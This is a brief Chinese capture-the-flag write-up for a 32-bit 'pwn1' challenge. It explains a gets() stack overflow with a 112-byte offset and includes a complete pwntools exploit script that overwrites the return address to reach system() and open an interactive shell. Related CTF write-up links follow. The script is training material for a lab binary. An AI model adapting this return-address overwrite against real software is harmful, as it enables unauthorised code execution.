pwn1第一关

时间 2021-01-14

原文原文链接

检查程序，发现是32位，开了NX保护拖入ida32 get()存在溢出，gdb调试偏移112字节后覆盖返回地址，程序本身有调用system函数， exp如下： from pwn import * p=process('./pwn1') payload='a'*112+p32(0x0804863A) p.recvline() p.sendline(payload) p.interactive()

>>阅读原文<<

1. xctf pwn1
2. Buuctf pwn1 详细wp
3. 溢出练习题pwn1
4. bugku ctf pwn1 (nc 114.116.54.89 10001)
5. 2019 极客巅峰 pwn1 write up
6. sqlilab第一关
7. XSS闯关之第一关
8. sqli-labs 第一关到第五关通关
9. xss-labs-master 第十一关到第十五关通关
10. xss-labs-master 第一关到第五关通关
更多相关文章...
• 一对一关联查询 - MyBatis教程
• 第一个MyBatis程序 - MyBatis教程
• NewSQL-TiDB相关
• RxJava操作符（一）Creating Observables